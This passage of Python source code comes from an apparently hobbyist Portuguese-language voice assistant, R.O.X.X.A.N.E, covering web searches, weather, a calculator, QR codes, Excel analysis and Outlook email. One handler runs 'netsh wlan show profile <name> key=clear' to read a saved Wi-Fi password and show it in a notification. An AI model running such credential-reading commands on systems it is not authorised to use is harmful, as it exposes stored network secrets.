self.fechar_assistente()
elif self.existe(['bom dia', 'boa tarde', 'boa noite']):
self.Boas_vindas()
self.voz_data = ' '
return
elif self.existe(['funcionando bem', 'como você tem estado', 'você tem estado', 'tem estado']):
self.engine_fala(f'Eu estou funcionando bem e sem problemas, {self.pessoa}, obrigada por perguntar')
self.engine_fala('como você está?')
while True:
voz = self.pegar_comandos_separados()
if 'bem' in voz:
self.engine_fala('Que bom, espero que continue assim!')
break
if 'mal' in voz or 'mau' in voz:
self.engine_fala('que pena, eu sei que logo logo vai passar')
break
self.voz_data = ' '
return
else:
self.respostas()
if self.voz_data.isspace():
self.run()
if self.voz_data != " ":
if self.retornar_fala_de_txt_resposta(str(self.voz_data)) is None:
self.escrever_em_txt_dados(str(self.voz_data))
self.voz_data = ' '
self.run()
else:
self.engine_fala(self.retornar_fala_de_txt_resposta(str(self.voz_data)))
self.voz_data = ' '
self.run()
# command handlers
def respostas(self):
cod = float(self.retornar_valor_previsto(self.voz_data))
for c in self.voz_data.split(" "):
if c not in self.vocabulario:
cod = -1
# search on Google
if self.existe(['pesquise por', 'pesquisar por', 'pesquise no google por']) or int(cod) == 3:
regex = re.compile(r"\s[porsbequialcnd]+(\s.*)", flags=re.I)
termo = regex.findall(self.voz_data)
url = "http://google.com/search?q=" + str(termo[0]).strip()
webbrowser.get().open(url)
self.voz_data = ' '
self.engine_fala(f"Aqui está o que você pediu sobre {termo[0]} no google")
self.voz_data = " "
return
# gmail
elif self.existe(['email', 'entrar no gmail', 'gmail']) or int(cod) == 4:
url = "https://mail.google.com/mail/u/0/#inbox"
webbrowser.get().open(url)
self.engine_fala("O gmail está aberto")
self.voz_data = ' '
return
# youtube
elif self.existe(["pesquise no youtube"]) or int(cod) == 5:
regex = re.compile(r"\s[youtbepralgs]+\s(?:[porsbealgcind]+)?\s(?:[porsbealg]+)?(.*)", flags=re.I)
termo = regex.findall(self.voz_data)
url = "http://www.youtube.com/results?search_query=" + str(termo[0]).strip()
webbrowser.get().open(url)
self.voz_data = ' '
self.engine_fala(f"Aqui está o que você pediu sobre no {str(termo[0])} youtube")
return
# open something
elif self.existe(["abrir o", "abrir a", "abrir"]) or int(cod) == 6:
regex = re.compile(r"[abrie]+\s?[\w]?\s(.*)", flags=re.I)
termo = regex.findall(self.voz_data)
self.abrir_algo(str(termo[0]))
self.voz_data = ' '
self.engine_fala(f"O {str(termo[0])} está aberto, pronto.")
return
# open Google
elif self.existe(['abra o google']) or int(cod) == 7:
url = "http://www.google.com/"
webbrowser.get().open(url)
self.engine_fala('pronto')
self.voz_data = ' '
return
# close the Chrome tab
elif self.existe(["fechar aba", 'fechar a', 'aba']) or int(cod) == 8:
pyautogui.PAUSE = 1
pyautogui.hotkey('ctrl', 'w')
self.engine_fala("Pronto.")
self.voz_data = ' '
return
# close everything
elif self.existe(["fechar abas", 'fechar todas as abas', 'fechar tudo']) or int(cod) == 9:
pyautogui.PAUSE = 1
pyautogui.hotkey('alt', 'f4')
self.engine_fala("Pronto.")
self.voz_data = ' '
return
# type something
elif self.existe(['escreva para mim', 'digite', "escreve"]) or int(cod) == 10:
if self.existe(['assunto copiado', 'assunto', 'copiado', 'escrever dados copiado']):
pyautogui.PAUSE = 1
copy(self.aux)
pyautogui.hotkey('ctrl', 'v')
self.voz_data = " "
return
escrever = self.voz_data
regex = re.compile(r"\s?[escrvapmiofdgt]+\s?(?:[escrvapmiof]+)?\s?(?:[escrvapmiof]+)?\s?(.*)", flags=re.I)
find = regex.findall(escrever)
copy(str(find[0]))
pyautogui.hotkey('ctrl', 'v')
self.voz_data = ' '
return
# say the time
elif self.existe(['me fale as horas', 'fale as horas', 'horas', 'que horas são']) or int(cod) == 0:
self.horario()
self.voz_data = ' '
return
# say today's date
elif self.existe(['me fale o dia de hoje', 'fale a data de hoje', 'que dia é hoje', 'data']) or int(cod) == 1:
self.datahj()
self.voz_data = ' '
return
# pause
elif self.existe(['parar', 'descansar', 'pausar', 'dar um tempo']) or int(cod) == 11:
self.parar()
# search on Wikipedia
elif self.existe(['assunto', 'wikipedia', 'pesquise um assunto']) or int(cod) == 12:
try:
self.engine_fala('Beleza, me fale qual o assunto que você quer que eu pesquise?')
voz = self.engine_reconition_online()
if voz is None:
voz = self.pegar_comandos_separados()
set_lang("pt")
voz = str(voz).split()
resultadowik = summary(voz[0], sentences=10)
self.engine_fala('Você deseja ouvir o assunto ou escrever em outro lugar:')
while True:
voza = str(self.pegar_comandos_separados())
if 'ouvir' in voza:
self.engine_fala("Beleza, vou falar o que achei")
self.engine_fala(resultadowik)
return
elif 'escrever' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
elif 'escrever em' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
elif 'escrever em outro lugar' in voza:
self.engine_fala("Beleza, assunto quardado na memória")
self.aux = resultadowik
break
except Exception:
self.engine_fala('Desculpe, não consegui me conectar a internet')
self.voz_data = ' '
return
# weather
elif self.existe(['me diga o clima', 'clima', 'me diga o tempo de hoje', 'tempo de hoje', 'tempo']) or int(
cod) == 2:
try:
url = get('https://api.hgbrasil.com/weather')
url_json = url.json()
# today's conditions
cida = url_json['results']['city']
temperatura = url_json['results']['temp']
condicao = url_json['results']['description']
humidade = url_json['results']['humidity']
velocidade_vento = url_json['results']['wind_speedy']
self.engine_fala("O tempo")
self.engine_fala("na cidade de " + cida + ":")
self.engine_fala("A temperatura é igual a " + str(temperatura) + "°C")
self.engine_fala("A condição de hoje é: " + condicao)
self.engine_fala("A humidade é de " + str(humidade) + '%')
self.engine_fala("A velocidade do vento é de " + str(velocidade_vento))
self.engine_fala('Você deseja ver um resumo dos próximos 10 dias?')
while True:
voz = str(self.pegar_comandos_separados())
aux = ''
if 'sim' in voz:
for c in range(10):
data = url_json['results']['forecast'][c]['date']
dia = url_json['results']['forecast'][c]['weekday']
maxi = url_json['results']['forecast'][c]['max']
mini = url_json['results']['forecast'][c]['min']
descricao = url_json['results']['forecast'][c]['description']
aux += ("Data: " + str(data) + ", Dia da semana: " + str(dia) + ", Temp. máxima: " + str(
maxi) + ', Temp. mínima:' + str(mini) + ", Clima: " + str(descricao) + "\n")
pyautogui.alert(aux, title='Resumo dos próximos dias')
break
if 'não' in voz or "não quero" in voz:
self.engine_fala("Beleza, vamos fazer o que agora?")
break
except exceptions.RequestException:
self.engine_fala('Desculpe, mas não consegui me conectar à internet')
self.voz_data = ' '
return
elif self.existe(['faça uma conta para mim', 'calculadora', 'calcular', 'faça uma conta']) or int(cod) == 13:
self.calculadora()
self.voz_data = ' '
return
elif self.existe(['qr code', 'code', 'faça um qr code', 'faça um code']) or int(cod) == 14:
self.criar_qrcode()
self.voz_data = ' '
return
elif self.existe(["tirar foto da tela", "tirar foto", "foto da tela"]) or int(cod) == 15:
pyautogui.screenshot(rf"C:\Users\{getlogin()}\Desktop\my_screenshot.png")
self.engine_fala("Pronto, foto salva na área de trabalho")
self.voz_data = ' '
return
elif self.existe(["me mande uma notificação", "mande uma notificação", "notificação"]) or int(cod) == 16:
if self.existe(['assunto', "assunto copiado"]):
self.notificar(self.aux)
self.voz_data = ' '
return
self.engine_fala("Qual o assunto da notificação: ")
while True:
vozNoti = self.engine_reconition_online()
if vozNoti is None:
vozNoti = self.pegar_comandos_separados()
if vozNoti is not None:
break
self.notificar(vozNoti)
self.voz_data = ' '
return
elif self.existe(["analisar dados", "dados", "fazer uma análise", 'análise', 'tabela', 'excel']) or int(
cod) == 17:
self.engine_fala("Certo, digita para mim o nome do arquivo em Excel(o arquivo tem que está na área de "
"trabalho)")
nome = self.chamar_valor(text="Digite o nome do arquivo: ")
dirs = listdir(rf"C:\\Users\\{getlogin()}\\Desktop")
saber_se_existe = 0
for dire in dirs:
if nome in dire:
if ".xlsx" in dire or ".xlsm" in dire:
saber_se_existe += 1
else:
self.engine_fala("O nome informado não é de um arquivo em excel")
self.engine_fala("Digite novamente")
if saber_se_existe == 0:
while True:
nome = self.chamar_valor(text="Digite novamente o nome do arquivo")
for dire in dirs:
if nome in dire:
if ".xlsx" in dire or ".xlsm" in dire:
self.engine_fala("Pronto, agora foi encontrado")
saber_se_existe = 0
break
else:
self.engine_fala("O nome informado não é de um arquivo em excel")
self.engine_fala("Digite novamente")
break
if saber_se_existe == 0:
break
tabela = pd.read_excel(rf"C:\\Users\\{getlogin()}\\Desktop\\{nome}.xlsx")
colunas = tabela.columns
resultado = pd.DataFrame()
op = ""
cont = 1
for coluna in colunas:
op += f"{cont}° coluna: {coluna}\n"
cont += 1
self.engine_fala("Digita para mim o que você quer fazer(Exemplo: ColunaTal vezes ColunaTal2)?")
cont = 1
while True:
self.engine_fala("Digite break para parar, digite o p para saber as opções")
oq = self.chamar_valor(text="Digite a expressão que deseja fazer:")
try:
if "+" in oq:
conta = oq
oq = oq.split("+")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] + tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "/" in oq:
conta = oq
oq = oq.split("/")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] / tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "*" in oq:
conta = oq
oq = oq.split("*")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] * tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "-" in oq:
conta = oq
oq = oq.split("-")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] - tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "^" in oq or "**" in oq:
conta = oq
oq = oq.split("^")
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[f"{cont}° modificação:"] = tabela[oq[0].strip()] ** tabela[oq[1].strip()]
tabela[f"{cont}° modificação:"] = resultado[f"{cont}° modificação:"]
op += f"{cont}° conta entre colunas: {conta}, nome registrado: {cont}° modificação:\n"
self.engine_fala("Pronto")
cont += 1
elif "agrupar_por" in oq:
self.engine_fala("Vou avisando que não é possível integrar outras colunas ou linhas para este"
"resultado")
self.engine_fala("Apenas exportar para alguma extensão(Excel, csv, json, etc)")
# syntax: agrupar_por <column> <aggregation> <columns_to_keep...>
# tokens:      0          1          2            3 onwards
if "soma" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=str(oq[1])).sum().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
if "media" in oq or "média" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=oq[1]).mean().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
if "mediana" in oq:
oq = oq.split()
coluns = []
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
for c in range(3, len(oq)):
coluns.append(oq[c])
resultado = tabela.groupby(by=oq[1]).median().loc[:, coluns]
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado agrupado.xlsx")
self.engine_fala("Pronto, arquivo salvo na área de trabalho")
continue
elif "ordenar_por" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
try:
resultado = resultado.sort_values(by=oq[1], ascending=oq[2])
except IndexError:
resultado = resultado.sort_values(by=oq[1])
except Exception:
resultado = resultado.sort_values(by=oq[1])
elif "menor_valor" in oq:
pyautogui.alert(title="Menor valor da tabela em memória", text=resultado.min())
elif "maior_valor" in oq:
pyautogui.alert(title="Menor valor da tabela em memória", text=resultado.max())
elif "descrição" in oq or "descricao" in oq:
pyautogui.alert(
title="Descrição das duas tabelas:", text="Tabela resultado:\n" + str(resultado.describe()))
pyautogui.alert(text="Tabela que você subiu:\n" + str(tabela.describe()), title="Descrição das duas "
"tabelas:")
# syntax: aplicar trocar <column or the table name used> <old_value> <new_value>
elif "aplicar" in oq:
if "trocar" in oq:
if nome in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.apply(lambda x: x.replace(oq[3], oq[4]))
else:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela[oq[2]].apply(lambda x: x.replace(oq[3], oq[4]))
self.engine_fala("Pronto, conta feita")
# syntax: mudar conta <where> <operation> <number>
elif "mudar" in oq and "conta" in oq:
if nome in oq and "somar" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.add(int(oq[4]))
else:
if "somar" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].add(int(oq[4]))
if nome in oq and "subtrair" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.sub(int(oq[4]))
else:
if "subtrair" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].sub(int(oq[4]))
if nome in oq and "multiplicar" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.mul(int(oq[4]))
else:
if "multiplicar" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].mul(int(oq[4]))
if nome in oq and "dividir" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
tabela.div(int(oq[4]))
else:
if "dividir" in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
resultado[oq[2]].div(int(oq[4]))
self.engine_fala("Pronto, conta feita")
# syntax: pesquisar <query expression to use>
elif "pesquisar" in oq:
if nome in oq:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
pd.set_option("max_columns", None)
pd.set_option("max_rows", None)
pyautogui.PAUSE = 1.5
pyautogui.press("win")
pyautogui.write("Bloco de notas")
pyautogui.press("backspace")
pyautogui.press("enter")
copy(str(tabela.query(oq[1])))
pyautogui.hotkey("ctrl", "v")
else:
oq = oq.split()
for i in range(len(oq)):
oq[i] = oq[i].replace("_", " ")
pd.set_option("max_columns", None)
pd.set_option("max_rows", None)
pyautogui.PAUSE = 1.5
pyautogui.press("win")
pyautogui.write("Bloco de notas")
pyautogui.press("backspace")
pyautogui.press("enter")
copy(str(resultado.query(oq[1])))
pyautogui.hotkey("ctrl", "v")
elif "op" in oq:
pyautogui.alert(title="Opções de colunas para contas", text=op)
elif "break" in oq:
resultado.to_excel(fr"C:\Users\{getlogin()}\Desktop\resultado.xlsx")
tabela.to_excel(fr"C:\Users\{getlogin()}\Desktop\tabela_usada.xlsx")
self.engine_fala("Pronto, o arquivo gerado como resultado foi salvo na área de trabalho com o "
"nome resultado.xlsx")
break
else:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
except Exception:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
except BaseException:
self.engine_fala("Você digitou algo errado ou fora das minhas configurações, por favor tente "
"novamente")
self.voz_data = ' '
return
elif self.existe(["senha do wifi", "wifi", "descobrir senha", "senha"]) or int(cod) == 18:
self.engine_fala("Digite o nome do wifi registrado")
nome = self.chamar_valor(text="Digite o noem da wifi:")
informacoes = check_output(["netsh", "wlan", "show", "profile", nome, "key", "=", "clear"],
encoding='cp858')
for c in informacoes.split("\n"):
if "Conteúdo da chave" in c:
pos = c.find(":")
senha = c[pos + 2:]
self.notificar(senha)
self.voz_data = ' '
return
elif self.existe(["memória ram usada", "usada", "memória ram", "ram", "memória"]) or int(cod) == 19:
ram_usada = f"{virtual_memory().percent:,.2f}"
ram_disponivel = f"{virtual_memory().available * 100 / virtual_memory().total:,.2f}"
self.engine_fala(f"Memória ram usada: {ram_usada}%, Memória ram disponível: {ram_disponivel}%")
self.voz_data = ' '
return
elif self.existe(["mandar email", "mandar e-mail", "email", 'e-mail', "mandar", "enviar", "enviar email",
"enviar email"]) or int(cod) == 20:
try:
self.engine_fala("Certo, digita para mim o email da pessoa que vai recever")
outlook = win32.Dispatch('outlook.application')
email = outlook.CreateItem(0)
email.To = self.chamar_valor("Digite o email da pessoa que vai receber: ")
self.engine_fala("agora digita o assunto")
email.Subject = self.chamar_valor("Qual o assunto do email: ")
global conteudo
while True:
self.engine_fala("Você quer escrever o conteúdo ou importar de um txt?")
importar = self.pegar_comandos_separados()
if "importar" in importar or 'texto' in importar or 'arquivo' in importar or 'txt' in importar:
conteudo = open(fr"C:\Users\{getlogin()}\Desktop\{importar}").read()
break
if "digitar" in importar or 'texto' in importar:
conteudo = self.chamar_valor("Digite o conteúdo: ")
break
while True:
self.engine_fala("O email tem anexo")
anexo_sim_nao = self.pegar_comandos_separados()
if "sim" in anexo_sim_nao:
self.engine_fala("Qual o nome do arquivo(ele precisa estar na área de trabalho)")
self.engine_fala("Ou digite o caminho inteiro do arquivo, com extensão")
arquivo = self.chamar_valor("Digite: ")
if "C:" in arquivo or ":" in arquivo or "\"" in arquivo:
email.Attachments.Add(arquivo)
break
else:
nome_arquivo = arquivo
anexo = rf"C:\Users\{getlogin()}\Desktop\{nome_arquivo}"
email.Attachments.Add(anexo)
break
if "não" in anexo_sim_nao:
break
css = '''
<style>
.email p {
font-size: 20px;
color: gray;
font-family: Arial, Helvetica, sans-serif;
}
</style>
'''
email.HTMLBody = f'''
<!DOCTYPE html>
<html>
<html lang="pt-BR">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
{css}
</head>
<body>
<section class="email">
<p>{conteudo}</p>
</section>
</body>
</html>
'''
email.Send()
self.voz_data = ' '
return
except Exception:
self.engine_fala("Desculpe, houve um erro")
self.engine_fala("O outlook não está configurado ou não consegui me conectar à internet")
else:
# options apps
if self.existe(self.opcoes):
self.abrir_algo(self.voz_data.lower())
elif self.existe(['fale as opções', 'opções de aplicativos', 'opções']):
self.engine_fala("Você deseja atualizar a lista de opções?")
self.engine_fala('beleza, vou te falar as opções, por favor diga apenas o número da opção que você '
'quer '
'depois de fechar a janela.')
self.engine_fala('As opções são: ')
aux = ''
cont = 1
for op in self.opcoes:
aux += f'{cont}° opção é: {op}\n'
cont += 1
pyautogui.alert(aux, title='Opções')
self.engine_fala('qual opção você quer?')
while True:
vozn = self.pegar_comandos_separados()
vozn = self.ajeitar_numero(vozn)
if type(vozn) == int:
self.abrir_algo(self.opcoes[vozn])
return
@staticmethod
def ajeitar_numero(numero):
nums = ['um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez']
for n in nums:
if n in numero:
return nums.index(n) + 1
def escrever_em_txt_dados(self, lista_palavras):
lista_frases = []
contR = int(self.arquivoF[-2]) + 1
with open(r"databaseF.txt", 'a', encoding='utf-8') as Fd:
lista_palavras = lista_palavras.replace(" ", "_")
Fd.write('\n')
Fd.write(f'{contR} ')
Fd.write(f'{lista_palavras} ')
self.engine_fala("Quais são as possíveis respostas para essa pergunta?")
self.engine_fala("fale 'break'/'parar' para parar!!!")
while True:
aux = self.engine_reconition_online()
if aux is None:
aux = self.pegar_comandos_separados()
if aux is not None:
if 'break' == aux:
break
if 'parar' == aux:
break
self.engine_fala("Pronto, frase salva no banco de dados")
lista_frases.append(aux)
self.escrever_em_txt_resposta(lista_frases, contR)
self.engine_fala("Pronto, frases salvas no banco de dados")
@staticmethod
def escrever_em_txt_resposta(lista_palavras, cont):
with open(r"databaseR.txt", 'a', encoding='utf-8') as R:
for passw in lista_palavras:
passw = passw.replace(" ", "_")
R.write('\n')
R.write(f'{cont} ')
R.write(f'{passw} ')
def retornar_fala_de_txt_resposta(self, fala):
try:
index = int(self.arquivoF[self.arquivoF.index(fala.replace(" ", "_")) - 1])
resposta = []
for c in range(int(self.arquivoR.index("1")), len(self.arquivoR), 2):
if int(self.arquivoR[c]) == int(index):
resposta.append(self.arquivoR[c + 1])
if len(resposta) > 1:
return resposta[randint(0, len(resposta) - 1)].replace("_", " ")
return resposta[0].replace("_", " ")
except ValueError:
return None
def fechar_assistente(self):
self.engine_fala("Tenha um bom dia! até logo!")
with open('rede_neural.xml', 'wb') as fi:
dump(self.netWork, fi)
janela.attributes("-topmost", True)
self.is_run = False
janela_aparecer.fechar()
exit(0)
def run(self):
while self.is_run:
try:
self.voz_data = self.engine_reconition_online()
if self.voz_data is None:
data = stream.read(8000)
if len(data) == 0:
break
if rec.AcceptWaveform(data):
resultado = rec.FinalResult()
resultado = loads(resultado)
if resultado is not None:
self.voz_data = resultado['text'].lower()
self.conversas()
else:
self.conversas()
except sr.WaitTimeoutError:
self.engine_fala('Por favor, não fique muito tempo sem falar')
continue
def criar_qrcode(self):
self.engine_fala("Você deseja criar vários qr codes ou apenas um?")
try:
while True:
voz = self.engine_reconition_online()
if voz is None:
voz = self.pegar_comandos_separados()
if voz is not None:
break
if 'apenas um' in voz or 'um' in voz or 'apenas' in voz:
self.engine_fala('Beleza, digita para mim o link que você deseja usar para criar o QR code')
link = self.chamar_valor(text="Digite o link: ")
self.engine_fala('Agora digite para mim o nome do arquivo: ')
nome = self.chamar_valor(text="Digite o nome do arquivo: ")
self.engine_fala('Certo, espera um pouco aí...')
meu_qrcode = qrcode.make(link)
meu_qrcode.save(fr"C:\Users\{getlogin()}\Desktop\qrcode_{nome}.png")
self.engine_fala("Pronto, já está na sua área de trabalho")
else:
self.engine_fala('Beleza, quantos você quer fazer?')
while True:
vozq = self.engine_reconition_online()
if vozq is None:
vozq = self.pegar_comandos_separados()
vozq = self.ajeitar_numero(vozq)
if vozq is not None:
break
links = {}
for c in range(int(vozq)):
nome = self.chamar_valor(text=f"{(c + 1)}°: Digite o nome do arquivo: ")
link = self.chamar_valor(text=f"{(c + 1)}°: Digite o link: ")
links[f'{nome}'] = str(link)
for produto in links:
meu_qrcode = qrcode.make(links[produto])
meu_qrcode.save(rf"C:\Users\{getlogin()}\Desktop\qrcode_{produto}.png")
self.engine_fala('Pronto, qr codes feitos')
except BaseException:
self.engine_fala('Desculpe, não pude realizar o processo, algo deu errado')
def calculadora(self):
self.engine_fala('Beleza, o que você deseja calcular?')
self.engine_fala('Por favor, falar apenas equações simples, afinal estou em fase de desenvolvimento')
try:
while True:
voz = self.engine_reconition_online()
if voz is None:
voz = self.pegar_comandos_separados()
if voz is not None:
voz = str(voz).lower()
if voz is not None:
break
voz = voz.split()
while True:
indexAux = ''
if str(voz).count("fatorial"):
nums = self.separar(voz, (voz.index("fatorial")))
num = nums[1]
valor_total = 1
for c in range(1, num + 1):
valor_total *= c
valor_total = int(valor_total)
voz.insert(int(voz.index("fatorial")), str(valor_total))
voz.remove("fatorial")
voz.remove("de")
voz.remove(str(nums[1]))
continue
if str(voz).count('elevado') != 0:
if '^' in voz:
indexAux = '^'
if 'elevado' in voz:
indexAux = 'elevado'
nums = self.separar(voz, (voz.index(indexAux)))
valor_total = pow(nums[0], nums[1])
valor_total = int(valor_total)
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'elevado':
voz.remove('a')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('x') != 0 or str(voz).count('vezes') != 0:
if 'x' in voz:
indexAux = 'x'
if 'vezes' in voz:
indexAux = 'vezes'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] * nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('/') != 0 or str(voz).count('dividido') != 0 or str(voz).count("÷"):
if '÷' in voz:
indexAux = '÷'
if 'dividido' in voz:
indexAux = 'dividido'
if '/' in voz:
indexAux = '/'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] / nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == "dividido":
voz.remove("por")
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('somado') != 0 or str(voz).count('+') != 0:
if '+' in voz:
indexAux = '+'
if 'somado' in voz:
indexAux = 'somado'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] + nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'somado':
voz.remove('a')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if str(voz).count('subtraido') != 0 or str(voz).count('-') != 0:
if '-' in voz:
indexAux = '-'
if 'subtraido' in voz:
indexAux = 'subtraido'
nums = self.separar(voz, voz.index(indexAux))
valor_total = (nums[0] - nums[1])
voz.insert(int(voz.index(indexAux)), str(valor_total))
voz.remove(indexAux)
if indexAux == 'subtraido':
voz.remove('de')
voz.remove(str(nums[0]))
voz.remove(str(nums[1]))
continue
if not str(voz).isalnum():
self.engine_fala('Deseja ouvir o resultado ou colar em algum lugar?')
while True:
vozsair = self.engine_reconition_online()
if vozsair is None:
vozsair = self.pegar_comandos_separados().lower()
break
if vozsair is not None:
vozsair = vozsair.lower()
break
if 'colar' in vozsair:
self.aux = vozsair
break
if 'ouvir' in vozsair:
self.engine_fala('O resultado é:' + str(voz).strip('[]').replace("'", ""))
break
if not str(voz).isalpha():
self.engine_fala("Pronto")
self.engine_fala("Retornando ao módulo principal")
except BaseException:
self.engine_fala("Desculpe, algo deu errado")
self.engine_fala("Pode ter sido a conexão, ou algum valor inválido")
@staticmethod
def separar(voz_data, index=0):
aux1 = 0
aux2 = 0
for c in range(index, -1, -1):
if voz_data[c].isnumeric():
aux1 = voz_data[c]
break
for c2 in range(index, len(voz_data)):
if voz_data[c2].isnumeric():
aux2 = voz_data[c2]
break
return [int(aux1), int(aux2)]
@staticmethod
def engine_fala(text):
"""
Speech output of the virtual assistant (text-to-speech).
"""
text = str(text)
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
engine.say(text)
engine.runAndWait()
def engine_reconition_online(self):
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.listen(source, 5, 5)
try:
self.voz_data = r.recognize_google(audio, language='pt')
return self.voz_data.lower()
except sr.UnknownValueError:
self.engine_fala(self.retornar_fala_de_txt_resposta("ei"))
except sr.RequestError:
return None
def Boas_vindas(self):
hora = int(datetime.now().hour)
if 0 < hora < 12:
self.engine_fala('Olá')
self.engine_fala('Bom dia')
elif 12 <= hora < 18:
self.engine_fala('Agora não é mais de manhã')
self.engine_fala('Já passou do meio dia')
self.engine_fala('Estamos no período da tarde')
self.engine_fala('Boa tarde')
else:
self.engine_fala('Agora não é de manhã')
self.engine_fala('Já estamos no período noturno')
self.engine_fala('Boa noite')
self.engine_fala(f'Oi {self.pessoa}, como você está?')
voz = self.pegar_comandos_separados()
if 'estou' in voz or 'obrigado' in voz or 'bem' in voz:
self.engine_fala('que bom, então, vamos fazer alguma coisa?')
voz = self.pegar_comandos_separados()
if 'bora' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif 'beleza' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif 'claro' in voz:
self.engine_fala('Beleza, bora')
self.run()
elif "vamor" in voz:
self.engine_fala('Beleza, bora')
self.run()
@staticmethod
def notificar(text=''):
notification.notify(title="R.O.X.X.A.N.E", message=text, timeout=20)
def horario(self):
hora = datetime.now()
self.engine_fala('Agora ' + hora.strftime('São %H horas e %M minutos'))
def datahj(self):
data = date.today()
semana = ('Segunda-feira', 'Terça-feira', 'Quarta-feira', 'Quinta-feira', 'Sexta-feira', 'Sábado', 'Domingo')
meses = ('Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto', 'Setembro', 'Outubro',
'Novembro', 'Dezembro')
mesatual = meses[data.month - 1]
ano = data.strftime(" de %Y")
self.engine_fala("Hoje é " + semana[data.weekday()])
self.engine_fala("Dia " + str(data.day) + " de " + mesatual + ano)
def abrir_algo(self, name):
pyautogui.PAUSE = 1.2
pyautogui.press('win')
pyautogui.write(name)
pyautogui.press('backspace')
pyautogui.press('enter')
self.run()
def chamar_valor(self, text=''):
try:
self.tela_valor_digitado(texto=text)
except BaseException:
self.pegar_valor()
return self.var
def pegar_valor(self):
try:
self.var = self.entradac.get()
except BaseException:
self.var = None
self.janelac.destroy()
def tela_valor_digitado(self, texto):
self.janelac = Tk()
self.janelac.title(f"{self.nome_assistente} por chat")
textoc = Label(self.janelac, text=texto)
textoc.grid(column=0, row=1, padx=25, pady=50)
self.entradac = Entry(self.janelac)
self.entradac.grid(column=0, row=2, padx=60, pady=10)
